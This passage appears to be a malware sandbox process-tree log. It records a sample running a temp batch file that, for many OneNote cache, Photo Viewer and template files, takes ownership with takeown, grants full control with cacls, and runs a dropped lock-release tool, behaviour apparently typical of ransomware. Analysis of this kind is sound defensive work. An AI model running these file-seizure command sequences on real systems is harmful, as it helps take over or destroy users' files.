  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000M.bin" -nobanner
      4⤵
      PID:8684
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
  2⤵
  PID:8700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
    3⤵
    PID:8704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
    3⤵
    - Modifies file permissions
    PID:9056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000010.bin" -nobanner
    3⤵
    PID:8736
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000010.bin" -nobanner
      4⤵
      PID:5896
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
    3⤵
    PID:5920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000054.bin" -nobanner
    3⤵
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000054.bin" -nobanner
      4⤵
      PID:2788
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
  2⤵
  PID:5908
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
    3⤵
    PID:7868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000070.bin" -nobanner
    3⤵
    PID:7712
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000070.bin" -nobanner
      4⤵
      PID:9228
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
  2⤵
  PID:7104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
    3⤵
    PID:9272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
    3⤵
    PID:9260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007A.bin" -nobanner
    3⤵
    PID:9320
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007A.bin" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
  2⤵
  PID:9372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
    3⤵
    PID:9424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
    3⤵
    PID:9472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007K.bin" -nobanner
    3⤵
    PID:9384
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007K.bin" -nobanner
      4⤵
      PID:8620
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
  2⤵
  PID:9552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
    3⤵
    PID:9596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
    3⤵
    PID:9584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000008J.bin" -nobanner
    3⤵
    PID:9628
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000008J.bin" -nobanner
      4⤵
      PID:9520
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
  2⤵
  PID:9664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
    3⤵
    PID:9764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
    3⤵
    PID:9752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000008V.bin" -nobanner
    3⤵
    PID:9784
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000008V.bin" -nobanner
      4⤵
      PID:9796
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:9816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:9944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:9896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:9964
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:9980
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:9836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:10068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:10016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:10108
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:10096
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:10128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:10032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:8476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:8464
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:7820
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:10200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:10168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:6612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:6628
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:8160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:7040
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:7148
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:2360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6432
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:8308
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:3892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:7464
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""
  2⤵
  PID:7528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"
    3⤵
    - Modifies file permissions
    PID:5348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000D.bin" -nobanner
    3⤵
    PID:3128
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000D.bin" -nobanner
      4⤵
      PID:5592
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C
    3⤵
    PID:8320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"
    3⤵
    - Modifies file permissions
    PID:8316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000P.bin" -nobanner
    3⤵
    PID:7604
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000P.bin" -nobanner
      4⤵
      PID:6212
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""
  2⤵
  PID:9032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000013.bin" -nobanner
    3⤵
    PID:5708
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000013.bin" -nobanner
      4⤵
      PID:7172
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""
  2⤵
  PID:7460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C
    3⤵
    PID:8016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006F.bin" -nobanner
    3⤵
    PID:6648
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006F.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7360
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C
    3⤵
    PID:8604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006P.bin" -nobanner
    3⤵
    PID:6396
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006P.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""
  2⤵
  PID:8276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"
    3⤵
    PID:7932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000073.bin" -nobanner
    3⤵
    PID:4736
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000073.bin" -nobanner
      4⤵
      PID:5564
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""
  2⤵
  PID:7240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C
    3⤵
    PID:7400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"
    3⤵
    - Modifies file permissions
    PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000081.bin" -nobanner
    3⤵
    PID:8200
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000081.bin" -nobanner
      4⤵
      PID:8408
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin""
  2⤵
  PID:6996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin" /E /G Admin:F /C
    3⤵
    PID:7284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009D.bin" -nobanner
    3⤵
    PID:6900
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009D.bin" -nobanner
      4⤵
      PID:8596
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin""
  2⤵
  PID:6620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin" /E /G Admin:F /C
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin"
    3⤵
    - Modifies file permissions
    PID:4228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AJ.bin" -nobanner
    3⤵
    PID:6716
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AJ.bin" -nobanner
      4⤵
      PID:6672
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin""
  2⤵
  PID:8572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin" /E /G Admin:F /C
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AV.bin" -nobanner
    3⤵
    PID:7156
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AV.bin" -nobanner
      4⤵
      PID:7072
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:6972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:3968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:8268
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:5188
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.metadata""
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.metadata" /E /G Admin:F /C
    3⤵
